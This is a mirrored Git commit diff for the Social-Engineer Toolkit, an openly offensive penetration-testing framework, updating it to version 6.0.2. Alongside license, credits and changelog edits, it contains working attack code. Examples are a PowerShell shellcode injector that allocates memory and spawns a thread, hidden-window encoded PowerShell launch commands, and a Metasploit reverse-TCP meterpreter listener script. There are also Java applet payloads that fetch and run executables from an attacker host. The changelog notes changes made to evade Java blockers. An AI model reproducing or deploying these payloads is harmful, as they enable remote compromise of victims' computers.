mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-11-26 14:30:18 +00:00
Updated a number of features
This commit is contained in:
parent
30fbc15dbe
commit
ca9f1fb2cf
11 changed files with 49 additions and 38 deletions
|
@ -5,8 +5,6 @@ Written by: David Kennedy (ReL1K)
|
||||||
|
|
||||||
Company: [TrustedSec](https://www.trustedsec.com)
|
Company: [TrustedSec](https://www.trustedsec.com)
|
||||||
|
|
||||||
Development Team: Thomas Werth, Joey Furr (j0fer), JR DePre (pr1me)
|
|
||||||
|
|
||||||
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes period.
|
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes period.
|
||||||
|
|
||||||
Please read the LICENSE under readme/LICENSE for the licensing of SET.
|
Please read the LICENSE under readme/LICENSE for the licensing of SET.
|
||||||
|
@ -23,5 +21,3 @@ For bug reports or enhancements, please open an issue here https://github.com/tr
|
||||||
|
|
||||||
- Linux
|
- Linux
|
||||||
- Windows (experimental)
|
- Windows (experimental)
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,3 +1,17 @@
|
||||||
|
~~~~~~~~~~~~~~~~
|
||||||
|
version 6.0.2
|
||||||
|
~~~~~~~~~~~~~~~~
|
||||||
|
|
||||||
|
* changed powershell injection technique to not exitonsession when creating the metasploit.rc file when specified in the powershell menu, this was already enabled when using psexec or other methods
|
||||||
|
* shrunk the powershell injection code command, not as much length needed - useful for shorter payloads
|
||||||
|
* slimmed down actual encoded powershell injection code, removed un-used code from the central powershell routine
|
||||||
|
* fixed a few typos and alignment on licensing agreement within SET and minor silly modifications to license
|
||||||
|
* fixed coloring when exiting and alignment for purpose of good disclaimer
|
||||||
|
* added print_status to bleeding edge tracking
|
||||||
|
* fixed unresponsive powershell injection when uses windows 8
|
||||||
|
* changed java applet user agent string inside applet to evade java blockers
|
||||||
|
* removed old ID and value parameters from the Java Applet database, no longer used based on changes through Java 7 update 42 - SET now uses manifest files
|
||||||
|
|
||||||
~~~~~~~~~~~~~~~~
|
~~~~~~~~~~~~~~~~
|
||||||
version 6.0.1
|
version 6.0.1
|
||||||
~~~~~~~~~~~~~~~~
|
~~~~~~~~~~~~~~~~
|
||||||
|
|
|
@ -62,6 +62,9 @@ Special thanks to the following people who have contributed to SET:
|
||||||
The Social-Engineer Development Team:
|
The Social-Engineer Development Team:
|
||||||
|
|
||||||
Dave Kennedy (ReL1K)
|
Dave Kennedy (ReL1K)
|
||||||
|
|
||||||
|
Former Developers on SET:
|
||||||
|
|
||||||
JR DePre (pr1me)
|
JR DePre (pr1me)
|
||||||
Thomas Werth
|
Thomas Werth
|
||||||
Joey Furr (j0fer)
|
Joey Furr (j0fer)
|
||||||
|
|
|
@ -1,27 +1,17 @@
|
||||||
|
|
||||||
Copyright 2013, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
|
Copyright 2014, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
|
||||||
All rights reserved.
|
All rights reserved.
|
||||||
|
|
||||||
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
||||||
|
|
||||||
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
||||||
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer
|
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
|
||||||
in the documentation and/or other materials provided with the distribution.
|
* Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
|
||||||
* Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from
|
|
||||||
this software without specific prior written permission.
|
|
||||||
|
|
||||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
|
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||||
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
|
|
||||||
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
|
|
||||||
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
|
||||||
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
|
|
||||||
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
|
|
||||||
The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.
|
The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.
|
||||||
|
|
||||||
Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.
|
Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.
|
||||||
|
|
||||||
Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit
|
Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author holds the right to refuse the hug (most likely will never happen) or the beer (also most likely will never happen).
|
||||||
is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever
|
|
||||||
see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author
|
|
||||||
holds the right to refuse the hug or the beer.
|
|
||||||
|
|
|
@ -145,9 +145,7 @@ try:
|
||||||
print line.rstrip()
|
print line.rstrip()
|
||||||
|
|
||||||
print bcolors.RED + """
|
print bcolors.RED + """
|
||||||
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are
|
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + bcolors.GREEN
|
||||||
not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting
|
|
||||||
yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + bcolors.GREEN
|
|
||||||
choice = raw_input("\nDo you agree to the terms of service [y/n]: ")
|
choice = raw_input("\nDo you agree to the terms of service [y/n]: ")
|
||||||
if choice == "yes" or choice == "y":
|
if choice == "yes" or choice == "y":
|
||||||
filewrite = file("src/agreement4", "w")
|
filewrite = file("src/agreement4", "w")
|
||||||
|
@ -155,7 +153,7 @@ yes (only one time), you agree to the terms of service and that you will only us
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
print bcolors.ENDC
|
print bcolors.ENDC
|
||||||
else:
|
else:
|
||||||
print "[!] Exiting the Social-Engineer Toolkit, have a nice day." + bcolors.ENDC
|
print bcolors.ENDC + "[!] Exiting the Social-Engineer Toolkit, have a nice day." + bcolors.ENDC
|
||||||
sys.exit()
|
sys.exit()
|
||||||
|
|
||||||
while 1:
|
while 1:
|
||||||
|
|
|
@ -24,6 +24,7 @@ try:
|
||||||
from Crypto.Cipher import AES
|
from Crypto.Cipher import AES
|
||||||
|
|
||||||
except ImportError:
|
except ImportError:
|
||||||
|
|
||||||
print "[!] The python-pycrypto python module not installed. You will lose the ability for encrypted communications."
|
print "[!] The python-pycrypto python module not installed. You will lose the ability for encrypted communications."
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
@ -229,7 +230,7 @@ def print_error(message):
|
||||||
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
|
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
|
||||||
|
|
||||||
def get_version():
|
def get_version():
|
||||||
define_version = '6.0'
|
define_version = '6.0.2'
|
||||||
return define_version
|
return define_version
|
||||||
|
|
||||||
class create_menu:
|
class create_menu:
|
||||||
|
@ -277,11 +278,13 @@ def meta_path():
|
||||||
else: msf_path = msf_path + "/"
|
else: msf_path = msf_path + "/"
|
||||||
trigger = 0
|
trigger = 0
|
||||||
if not os.path.isdir(msf_path):
|
if not os.path.isdir(msf_path):
|
||||||
|
|
||||||
# specific for kali linux
|
# specific for kali linux
|
||||||
if os.path.isfile("/opt/metasploit/apps/pro/msf3/msfconsole"):
|
if os.path.isfile("/opt/metasploit/apps/pro/msf3/msfconsole"):
|
||||||
msf_path = "/opt/metasploit/apps/pro/msf3/"
|
msf_path = "/opt/metasploit/apps/pro/msf3/"
|
||||||
trigger = 1
|
trigger = 1
|
||||||
# specific for backtrack5
|
|
||||||
|
# specific for backtrack5 and other backtrack versions
|
||||||
if os.path.isfile("/opt/framework3/msf3/msfconsole"):
|
if os.path.isfile("/opt/framework3/msf3/msfconsole"):
|
||||||
msf_path = "/opt/framework3/msf3/"
|
msf_path = "/opt/framework3/msf3/"
|
||||||
trigger = 1
|
trigger = 1
|
||||||
|
@ -294,6 +297,7 @@ def meta_path():
|
||||||
if os.path.isfile("/usr/bin/msfconsole"):
|
if os.path.isfile("/usr/bin/msfconsole"):
|
||||||
msf_path = ""
|
msf_path = ""
|
||||||
trigger = 1
|
trigger = 1
|
||||||
|
|
||||||
# specific for pwnpad and pwnplug (pwnie express)
|
# specific for pwnpad and pwnplug (pwnie express)
|
||||||
if os.path.isfile("/opt/metasploit-framework/msfconsole"):
|
if os.path.isfile("/opt/metasploit-framework/msfconsole"):
|
||||||
msf_path = "/opt/metasploit-framework"
|
msf_path = "/opt/metasploit-framework"
|
||||||
|
@ -307,6 +311,8 @@ def meta_path():
|
||||||
print_error("Please configure in the config/set_config.")
|
print_error("Please configure in the config/set_config.")
|
||||||
return_continue()
|
return_continue()
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
# if we are using windows
|
||||||
if check_os() == "windows":
|
if check_os() == "windows":
|
||||||
print_warning("Metasploit payloads are not currently supported. This is coming soon.")
|
print_warning("Metasploit payloads are not currently supported. This is coming soon.")
|
||||||
msf_path = ""
|
msf_path = ""
|
||||||
|
@ -425,6 +431,8 @@ def bleeding_edge():
|
||||||
print_status("Bleeding edge already active..Moving on..")
|
print_status("Bleeding edge already active..Moving on..")
|
||||||
subprocess.Popen("apt-get update;apt-get upgrade -f -y --force-yes;apt-get dist-upgrade -f -y --force-yes;apt-get autoremove -f -y --force-yes", shell=True).wait()
|
subprocess.Popen("apt-get update;apt-get upgrade -f -y --force-yes;apt-get dist-upgrade -f -y --force-yes;apt-get autoremove -f -y --force-yes", shell=True).wait()
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
# else lets add them if they want
|
||||||
else:
|
else:
|
||||||
print_status("Adding Kali bleeding edge to sources.list for updates.")
|
print_status("Adding Kali bleeding edge to sources.list for updates.")
|
||||||
# we need to add repo to kali file
|
# we need to add repo to kali file
|
||||||
|
@ -451,6 +459,7 @@ def update_set():
|
||||||
time.sleep(2)
|
time.sleep(2)
|
||||||
bleeding_edge()
|
bleeding_edge()
|
||||||
|
|
||||||
|
# if we aren't running Kali :(
|
||||||
else:
|
else:
|
||||||
peinr_info("Kali-Linux not detected, manually updating..")
|
peinr_info("Kali-Linux not detected, manually updating..")
|
||||||
print_info("Updating the Social-Engineer Toolkit, be patient...")
|
print_info("Updating the Social-Engineer Toolkit, be patient...")
|
||||||
|
@ -1245,8 +1254,10 @@ def generate_powershell_alphanumeric_payload(payload,ipaddr,port, payload2):
|
||||||
|
|
||||||
# heres our shellcode prepped and ready to go
|
# heres our shellcode prepped and ready to go
|
||||||
shellcode = newdata[:-1]
|
shellcode = newdata[:-1]
|
||||||
|
|
||||||
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand - this incorporates a new process downgrade attack where if it detects 64 bit it'll use x86 powershell. This is useful so we don't have to guess if its x64 or x86 and what type of shellcode to use
|
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand - this incorporates a new process downgrade attack where if it detects 64 bit it'll use x86 powershell. This is useful so we don't have to guess if its x64 or x86 and what type of shellcode to use
|
||||||
powershell_command = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc ";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" % (shellcode))
|
powershell_command = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc ";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" % (shellcode))
|
||||||
|
|
||||||
# unicode and base64 encode and return it
|
# unicode and base64 encode and return it
|
||||||
return base64.b64encode(powershell_command.encode('utf_16_le'))
|
return base64.b64encode(powershell_command.encode('utf_16_le'))
|
||||||
|
|
||||||
|
@ -1261,7 +1272,6 @@ def generate_shellcode(payload,ipaddr,port):
|
||||||
repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'unsigned char buf=' : '', 'unsignedcharbuf[]=' : ''}
|
repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'unsigned char buf=' : '', 'unsignedcharbuf[]=' : ''}
|
||||||
data = reduce(lambda a, kv: a.replace(*kv), repls.iteritems(), data).rstrip()
|
data = reduce(lambda a, kv: a.replace(*kv), repls.iteritems(), data).rstrip()
|
||||||
# return data
|
# return data
|
||||||
print data
|
|
||||||
return data
|
return data
|
||||||
|
|
||||||
# this will take input for shellcode and do a replace for IP addresses
|
# this will take input for shellcode and do a replace for IP addresses
|
||||||
|
@ -1602,18 +1612,18 @@ def bleeding_edge():
|
||||||
# first check if we are actually using Kali
|
# first check if we are actually using Kali
|
||||||
kali = check_kali()
|
kali = check_kali()
|
||||||
if kali == "Kali":
|
if kali == "Kali":
|
||||||
print "[*] Checking to see if bleeding-edge repos are active."
|
print_status("Checking to see if bleeding-edge repos are active.")
|
||||||
# check if we have the repos enabled first
|
# check if we have the repos enabled first
|
||||||
fileopen = file("/etc/apt/sources.list", "r")
|
fileopen = file("/etc/apt/sources.list", "r")
|
||||||
kalidata = fileopen.read()
|
kalidata = fileopen.read()
|
||||||
if "deb http://repo.kali.org/kali kali-bleeding-edge main" in kalidata:
|
if "deb http://repo.kali.org/kali kali-bleeding-edge main" in kalidata:
|
||||||
print "[*] Bleeding edge already active..Moving on.."
|
print_status("Bleeding edge already active..Moving on..")
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
print "[!] Bleeding edge repos were not detected. This is recommended."
|
print_warning("Bleeding edge repos were not detected. This is recommended.")
|
||||||
enable = raw_input("Do you want to enable bleeding-edge repos for fast updates [yes/no]: ")
|
enable = raw_input("Do you want to enable bleeding-edge repos for fast updates [yes/no]: ")
|
||||||
if enable == "y" or enable == "yes":
|
if enable == "y" or enable == "yes":
|
||||||
print "[*] Adding Kali bleeding edge to sources.list for updates."
|
print_status("Adding Kali bleeding edge to sources.list for updates.")
|
||||||
# we need to add repo to kali file
|
# we need to add repo to kali file
|
||||||
# we will rewrite the entire apt in case not all repos are there
|
# we will rewrite the entire apt in case not all repos are there
|
||||||
filewrite = file("/etc/apt/sources.list", "w")
|
filewrite = file("/etc/apt/sources.list", "w")
|
||||||
|
|
|
@ -183,7 +183,7 @@ def deploy_hex2binary(ipaddr,port,username,password):
|
||||||
|
|
||||||
x86 = file(setdir + "/x86.powershell", "r")
|
x86 = file(setdir + "/x86.powershell", "r")
|
||||||
x86 = x86.read()
|
x86 = x86.read()
|
||||||
x86 = "powershell -nop -win hidden -noni -enc " + x86
|
x86 = "powershell -nop -win hid -noni -enc " + x86
|
||||||
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
|
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
|
||||||
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
||||||
filewrite.write(x86)
|
filewrite.write(x86)
|
||||||
|
|
|
@ -64,7 +64,7 @@ try:
|
||||||
|
|
||||||
x86 = file(setdir + "/x86.powershell", "r")
|
x86 = file(setdir + "/x86.powershell", "r")
|
||||||
x86 = x86.read()
|
x86 = x86.read()
|
||||||
x86 = "powershell -nop -window hidden -noni -enc " + x86
|
x86 = "powershell -nop -win hid -noni -enc " + x86
|
||||||
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
|
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
|
||||||
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
||||||
filewrite.write(x86)
|
filewrite.write(x86)
|
||||||
|
|
|
@ -40,7 +40,7 @@ if powershell_menu_choice != "99":
|
||||||
# here we format everything for us
|
# here we format everything for us
|
||||||
x86 = file(setdir + "/x86.powershell", "r")
|
x86 = file(setdir + "/x86.powershell", "r")
|
||||||
x86 = x86.read()
|
x86 = x86.read()
|
||||||
x86 = "powershell -nop -windows hidden -noni -enc " + x86
|
x86 = "powershell -nop -win hid -noni -enc " + x86
|
||||||
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
|
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
|
||||||
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
||||||
filewrite.write(x86)
|
filewrite.write(x86)
|
||||||
|
@ -53,7 +53,7 @@ if powershell_menu_choice != "99":
|
||||||
# if we want to start the listener
|
# if we want to start the listener
|
||||||
if choice == 'YES':
|
if choice == 'YES':
|
||||||
filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
|
filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
|
||||||
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port))
|
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j" % (port))
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
msf_path = meta_path()
|
msf_path = meta_path()
|
||||||
subprocess.Popen("ruby %s/msfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait()
|
subprocess.Popen("ruby %s/msfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait()
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
<applet code="Java.class" width="1" height="1" id="IDREPLACEHERE" archive="Signed_Update.jar"><param name="name" value="IDREPLACEHERE"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="10" value=""><param name="separate_jvm" value="true"></applet>
|
<applet code="Java.class" width="1" height="1" archive="Signed_Update.jar"><param name="name"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="10" value=""><param name="separate_jvm" value="true"></applet>
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
<applet width="1" height="1" id="IDREPLACEHERE" code="Java.class" archive="Signed_Update.jar"><param name="WINDOWSPLZ" value="http://ipaddrhere/msf.exe"><param name="ILIKESTUFF" value=""><param name="OSX" value="http://ipaddrhere/mac.bin"><param name="LINUX" value="http://ipaddrhere/nix.bin"><param name="X64" value=""><param name="X86" value=""><param name="HUGSNOTDRUGS" value="freehugs"><param name="LAUNCH" value="YES"><param name="nextPage" value=""><param name="separate_jvm" value="true"></applet>
|
<applet code="Java.class" width="1" height="1" id="IDREPLACEHERE" archive="Signed_Update.jar"><param name="name" value="IDREPLACEHERE"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="10" value=""><param name="separate_jvm" value="true"></applet>
|
||||||
|
|
Loading…
Reference in a new issue